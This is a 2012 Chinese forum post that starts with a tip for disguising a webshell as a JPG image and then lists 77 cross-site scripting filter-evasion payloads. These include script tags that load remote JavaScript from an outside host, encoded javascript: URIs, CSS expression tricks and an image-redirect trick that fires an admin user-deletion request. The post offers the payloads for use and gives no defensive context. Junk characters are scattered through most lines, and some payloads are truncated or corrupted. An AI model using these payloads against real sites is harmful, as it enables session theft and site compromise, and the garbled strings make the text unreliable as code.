跨站图片shell
% s' s8 i2 G# h$ ]: V1 ~XSS跨站代码 <script>alert("")</script>
1 `7 ~7 j6 S2 A0 r% ~' Q0 Z& f3 X6 P9 g% ]. z, X0 y
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
3 X, z1 @$ b, |
. {5 f6 r5 _+ F
# I- i6 |7 ~1 x2 a/ _( x, ^: ^' r5 Q! g2 O
1)普通的XSS JavaScript注入
; R! U$ S% Y4 H( A: f* d<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 P/ v) F! l; K2 S V: [0 \/ [0 g1 Y9 N. T) b
(2)IMG标签XSS使用JavaScript命令0 g' G$ b* n/ z2 N& O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 s& N, H% x3 q* F M, R4 B- U
* J" a1 w$ ]: }
(3)IMG标签无分号无引号
! B2 W! T y/ m+ Q& ~* Y& s: Y1 w<IMG SRC=javascript:alert(‘XSS’)>
. O1 p( T& Z4 V, C+ J7 [" A
! I7 I! Y! k& u6 \4 Q(4)IMG标签大小写不敏感
; X, J: E5 z; l1 D" m$ r- L<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 n$ k/ \2 T1 p/ y
9 k$ \7 W4 v, s! G2 B4 X4 s
(5)HTML编码(必须有分号)& u2 ?* g8 i: l, M
<IMG SRC=javascript:alert(“XSS”)>2 p" |1 _ L- n9 u/ w' ]
4 A8 E2 _, L! z# i, P) p. v6 z" h(6)修正缺陷IMG标签" N& t; I8 `; e" ]& b$ Z6 o
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 w* P5 v, K7 t' }; o8 D1 \# \+ A8 w' p3 O) ^, Y
(7)formCharCode标签(计算器)+ v3 b( v. Z, s( ? l, B, o- w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 |& E: H* D c S( m3 t2 y1 I7 l% v0 T. W) X0 e1 D( i
(8)UTF-8的Unicode编码(计算器)
( p A% ]! X e5 k4 G5 g; x<IMG SRC=jav..省略..S')>9 C6 U, _6 J3 g" d- R; R
: I q+ o& V% J) i7 P2 q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 u8 Y/ `& I- \ Z- [
<IMG SRC=jav..省略..S')>
; v& ?+ ~" [) l
2 [6 X( k% k+ P; x6 N1 F" T- k" p(10)十六进制编码也是没有分号(计算器), p7 P+ |0 a3 ~2 R
<IMG SRC=java..省略..XSS')>1 _. q: C& ]3 g! b
2 w2 v3 V$ n3 x. k0 E' L- n/ L7 F(11)嵌入式标签,将Javascript分开7 F# u' o T- O+ z/ P8 [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 i; Y. b- b' ~ T) w8 B, ^! L( h
(12)嵌入式编码标签,将Javascript分开
; \. Z% e+ f! s4 e<IMG SRC=”jav ascript:alert(‘XSS’);”> H# R o/ j) P7 ^& |$ e; u
: K# l, I2 _8 j* j+ l
(13)嵌入式换行符
) ~( ]1 V/ V# G$ g D# g<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 ~: t& l/ L2 _- j% |+ x
2 O' Q+ k' N3 T3 S2 a+ a) ]" C(14)嵌入式回车
, r5 X) b: W$ m+ B6 r' K+ P! d<IMG SRC=”jav ascript:alert(‘XSS’);”>& `- Z6 e2 D: V. u: ]$ g
+ Q8 \ H1 v6 T1 n C(15)嵌入式多行注入JavaScript,这是XSS极端的例子; b- s/ u: q+ q( d
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 g+ _: f, N# k9 Z9 u
2 }6 `# F& O) J% l Q(16)解决限制字符(要求同页面)
% e' P. R# w* ]+ n4 n5 i3 \<script>z=’document.’</script>
( G% \* i" z% U J6 j t& ]' B<script>z=z+’write(“‘</script>$ N% h! q" `4 F
<script>z=z+’<script’</script>
& L$ Z1 V8 D6 N- G<script>z=z+’ src=ht’</script>
$ `6 U) s z/ B" m2 j<script>z=z+’tp://ww’</script>
0 M1 C2 S& z! N8 b& K1 o# }<script>z=z+’w.shell’</script>* Q. y0 U$ @+ _* ?( T. D# i
<script>z=z+’.net/1.’</script>
# ~/ z# ]. P/ Y" e* E<script>z=z+’js></sc’</script>
0 @% R/ W6 D& C9 B, k* u6 X<script>z=z+’ript>”)’</script>
" v! ?; C3 Z! N* n: {8 H) d<script>eval_r(z)</script>9 o; N- c" J6 Y/ N: v/ i
! t# ?# ]' e3 v6 j' h
(17)空字符
9 } d j1 v0 {perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" o( d3 |# \7 |/ ~9 t$ }. d0 d; D9 R- v% P! [/ y/ M% D% T- e
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; t" [, w1 V- q L K+ [$ @' j% q" v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 p' k7 G# y$ ` i4 M1 k* h# X; f; j. x5 j
(19)Spaces和meta前的IMG标签
: A) H. Z1 W0 ?6 {- x) `- v& |<IMG SRC=” javascript:alert(‘XSS’);”>% G# ^, i' X. q7 H2 V1 v9 `
+ t' k# R6 \0 S(20)Non-alpha-non-digit XSS
3 i$ x# G* m4 i9 d; _: e% _$ [<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># u+ d. c. c7 P% |8 N
8 b- A3 ]1 P% x(21)Non-alpha-non-digit XSS to 2
1 Z6 N8 V6 F: s k<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 I* n; l) f' _+ h2 h- S8 x9 X4 u. Z+ }" d' r
(22)Non-alpha-non-digit XSS to 3
1 q, E% _" g/ f<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ y7 y/ M, c8 M7 P R5 c! p: n
; q8 j$ d* ]+ o, Y(23)双开括号
3 {1 _( S0 `- d6 n& i2 l<<SCRIPT>alert(“XSS”);//<</SCRIPT>& Y2 X! q5 |6 M" i
6 s. V+ r7 _0 H* F! X0 G(24)无结束脚本标记(仅火狐等浏览器)& v. s" C% o1 V, I& y+ g; D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! ]& V0 R& V" d) @, C; Z
4 @8 N6 F2 _( L. a. X" @* \9 m
(25)无结束脚本标记2
. w, F% K) |& d8 m& m, o8 i9 U<SCRIPT SRC=//3w.org/XSS/xss.js>
1 Q% F6 X( Q5 ?3 T5 Z
. T( M' N; @$ _ {(26)半开的HTML/JavaScript XSS, m( K3 e" J' N0 V: f
<IMG SRC=”javascript:alert(‘XSS’)”
% ? S( Y. e! ^. T+ P
- R3 ?& T0 T5 y. P4 w5 H(27)双开角括号$ u7 g) Z2 u5 g" x
<iframe src=http://3w.org/XSS.html <
/ M- U7 b2 N3 I& D1 d; r6 r2 W" p% n P( e4 t) y
(28)无单引号 双引号 分号
@& ?% W% j0 J- n3 @. O<SCRIPT>a=/XSS/: {3 U3 x) @0 I" L" }
alert(a.source)</SCRIPT>
0 K* `2 m, W8 D
& \1 j/ T0 E) P(29)换码过滤的JavaScript1 k! f9 N7 u7 z8 g% z) o
\”;alert(‘XSS’);//
/ [" _" o$ i# h. O3 t! t0 ^1 Z# h3 T" p+ j1 s
(30)结束Title标签
- p: p) e) E# D$ `</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 A. @# _! M& w0 ?& b( r$ y( {% t& d7 _1 c
(31)Input Image
6 i" m e- ?! p' f<INPUT SRC=”javascript:alert(‘XSS’);”>. Y: E! g/ l% T+ v( F4 r
6 P/ ?8 ^7 W* w- u7 e' Z. p% D(32)BODY Image
+ V" F4 Y* U* _<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. M [: n; a8 M1 B4 C/ g
6 e' M& r( k4 {5 L) T% s
(33)BODY标签
. k9 m( C4 w6 H2 Y) ^% G<BODY(‘XSS’)>
$ c7 i) s7 R& t( H* a; N
+ e0 j" V/ T& @, x: u+ i" b o(34)IMG Dynsrc1 }6 X+ c# I. ]! g' C }5 j, ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>; t) ]% T" A( S/ g
? V0 d" m6 V u(35)IMG Lowsrc/ T6 W& ~( z3 A
<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 N4 K6 Q5 u9 F8 K. t
* V, I/ ], D+ Y7 [7 N6 o% J
(36)BGSOUND
% ^& \1 Y4 a5 ^6 i6 G# m* x/ S4 _5 {<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. s. \" r+ F Y. @8 G
, E8 r4 [0 q& `/ c8 Y$ R(37)STYLE sheet; f- n! e7 d. V! O: p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 A# f+ @7 w, e5 R* a- H+ [0 x8 O1 n5 o2 e& F" V
(38)远程样式表
2 f$ j% y- v: _6 i; P6 k<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 H2 u7 ^& o" H: o/ w- S5 o# t
|' K [# E- |# U' c(39)List-style-image(列表式)
0 A$ U& o. v* }4 Y+ M O<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: [: i) z' i2 `* _
2 K6 X& A4 n6 Q6 U" L/ A+ q(40)IMG VBscript0 @2 S5 o, G+ Q. I7 K4 Q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS9 A5 e, }1 p, g/ X
+ U; M1 J# e& J7 ]" F(41)META链接url
3 K: i9 Q8 {4 d$ U8 Z$ x<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 L9 o3 K% |4 J! I* s6 F. i' J
; z" E3 s9 d6 S8 B" r, f' o
(42)Iframe7 _. S4 P4 \% z9 p) Y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> L4 d: b0 u" d4 X- C, j
(43)Frame8 {& X: ^! L& ~ G
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>, |& Y% j% }( D" ^- M0 I
0 f s. w. m* q }# O, Q(44)Table
& W* O0 i# A) H% R<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 d6 m( H* K/ d; D
, y1 T; P; ?( ^5 s% h% `1 Y(45)TD
. ^* m) j D9 F* h<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 B# [% g L& g2 g( B
1 @8 m2 l( V5 B(46)DIV background-image
( N1 z& y0 ^# ?4 t: {# L4 ^<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 k7 L, F# W z7 B* z# E) F
' T. @/ q( b! G! V( \) D' C% }
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), z0 Z9 w" G4 t/ n+ @
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>2 T+ {) a( U. C7 w1 X5 D
3 X% B3 k5 a( n+ r& m
(48)DIV expression
( s/ W Q- W3 d% Z6 N' N; V: g1 [<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 H. F' i0 q% k; F) R& t- G" q: G, b* A/ w# @; y$ e& q
(49)STYLE属性分拆表达0 I' g' r2 Z! G" k0 v% m) V) n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 b: ?' H5 n! `5 q
" N2 X3 N+ O, k7 n" a(50)匿名STYLE(组成:开角号和一个字母开头)
; N; M3 z! m1 y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, w# N; `/ o: W5 `, o) |* G) H& |2 q+ t6 S
(51)STYLE background-image
" ]$ Z6 e/ J( j/ h- U, `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 o/ `8 C- G! t# q, B- Q2 p( k
# u) V W6 Z8 W G(52)IMG STYLE方式
- |2 i0 |8 m" x+ j, m1 J' Wexppression(alert(“XSS”))’>
7 }) q+ ]4 H( v O3 K/ `$ }# l2 J4 }* S3 t' X8 v, J5 K2 L
(53)STYLE background# N6 h9 C& e: l) r- h+ C2 f8 `9 f
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- t9 V3 S; m0 ~
' ~, ], ]% J- f7 n% N2 x
(54)BASE
& x/ p" n1 M$ N7 X3 y<BASE HREF=”javascript:alert(‘XSS’);//”>9 ]( [ @& u1 C( n C3 m( F5 l, q* V
|" z ~1 ?. Y, Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" R/ t5 g8 x8 ^% m: \
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, P$ _, J& {2 i: `; D) W- O7 B) ?( l
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 O! K2 F9 V( F1 z* qa=”get”;% x1 Z* G7 W6 Y) w$ h& Z) n, u
b=”URL(\”";
/ y0 I# k @9 l; N/ n$ m/ Rc=”javascript:”;3 ^7 y$ o2 {( x
d=”alert(‘XSS’);\”)”;
" q" q2 S& k6 meval_r(a+b+c+d);
4 R/ K2 p% O i) L" H5 i+ [3 i% ~. J# F; w* c. l" s) ~' ~
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 [5 d. t; O P) S/ ]; z<HTML xmlns:xss>4 W2 `# {5 U3 C6 {) _
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 u2 P# b) m q<xss:xss>XSS</xss:xss>
4 C/ j! Q# g' Z& ]1 x+ A</HTML>
0 ]3 g! p2 ?: O2 S- c: p4 H2 O9 v0 s& y8 Q" W$ X
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
+ h% ] D' Q) Z( ?3 i0 z1 |' L6 p<SCRIPT SRC=””></SCRIPT>6 Y. g* N: ~; G
- @4 [, ]! p: w. x(59)IMG嵌入式命令,可执行任意命令
4 E* S I. y" m: [<IMG SRC=”http://www.XXX.com/a.php?a=b”>, t' P* G. M9 m, D
/ m+ W$ o3 @! H9 V5 c
(60)IMG嵌入式命令(a.jpg在同服务器)
4 _8 _% `2 d; ~0 ~% @9 w1 ZRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 W0 u3 M+ j6 K/ X3 B( l
& h$ r3 }+ D6 q(61)绕符号过滤8 x, a* C b' h3 @% Q" E7 q$ n
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 B) y" _+ H$ U O
! m' S$ H9 @9 S; ^( M7 p2 _0 v(62)* |' J3 e: U) u- R- {# E: d
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, z: Y* B5 q2 f* Z/ q
% X( z7 X3 A1 d; r7 }: t3 u(63), O4 a2 p. p% z& J( ?4 z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 Z( n0 r6 ]2 U( Y& D6 P/ ]
6 [; d' [" U$ v# l; ]% b(64)
9 B8 q4 u0 u& k4 N2 [6 h<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% k& x; g5 ?0 J
+ V6 ~- j3 b# o% q! K' u. g(65)
- G+ @+ ]% P) n6 S! b" R<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! h3 ~$ Q% i6 E" d6 P4 @5 ~. c: W$ ?2 M2 Z
(66)
! R* f3 d& w1 B; u3 k<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& {5 U" O, V% w: h7 @, m
4 l& F' L4 C6 L% _(67)3 Q; f/ G2 S f$ _7 l
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>) G& q6 G( i0 q& V
: H) L5 E; M$ s" z7 Y1 p
(68)URL绕行. m2 |3 B% w& o+ }8 x
<A HREF=”http://127.0.0.1/”>XSS</A>
h4 O( o8 [$ v! ~! z- m8 U( x# A' g" `: T' V) |$ {
(69)URL编码; V- F6 g% ]9 t- q
<A HREF=”http://3w.org”>XSS</A>
* I$ y: O" x- L) T" F$ S& k4 E$ Y# w6 P8 O; ~
(70)IP十进制
- @' [, d6 Z4 i8 `& ]<A HREF=”http://3232235521″>XSS</A>7 {8 l8 ^5 i' D# P1 z0 Z
; ~6 N1 P5 z! |* f(71)IP十六进制
8 ?$ k4 X8 I! I) X3 u# n<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ O' r* C9 o9 d6 I
$ S7 ^9 Q3 R& |" r(72)IP八进制6 F) |4 i0 r p- F' o
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
" h5 i' e7 I& c, @
2 |( A* P- Q& P(73)混合编码) v4 E" A: v$ H' Y, V/ ]
<A HREF=”h
|8 j8 K* `' wtt p://6 6.000146.0×7.147/”">XSS</A>* r+ d0 C8 @' u$ }6 ?9 B6 J
- w2 g# X- ]; D( U E1 B1 u(74)节省[http:]* }0 p& N* a; J! z
<A HREF=”//www.google.com/”>XSS</A>. y+ T) Q, x. s- y" U! G& E6 d
& n+ ~* R: V, C8 ~/ R5 ~( ~(75)节省[www]7 ?/ T/ ?" V0 \( Q$ E
<A HREF=”http://google.com/”>XSS</A>
% p8 z% B' s5 {+ P+ K4 S% n2 c3 {1 Y* p
(76)绝对点绝对DNS1 l8 U! \% @* V' p
<A HREF=”http://www.google.com./”>XSS</A>
: O; A- `/ B, ?5 `, h9 C: G1 \. P7 i
(77)javascript链接
9 f3 A1 P: J: |. R<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>9 u/ R& p4 i$ N5 W
|
发表于 2012-9-13 17:04:56
收藏
分享
支持
反对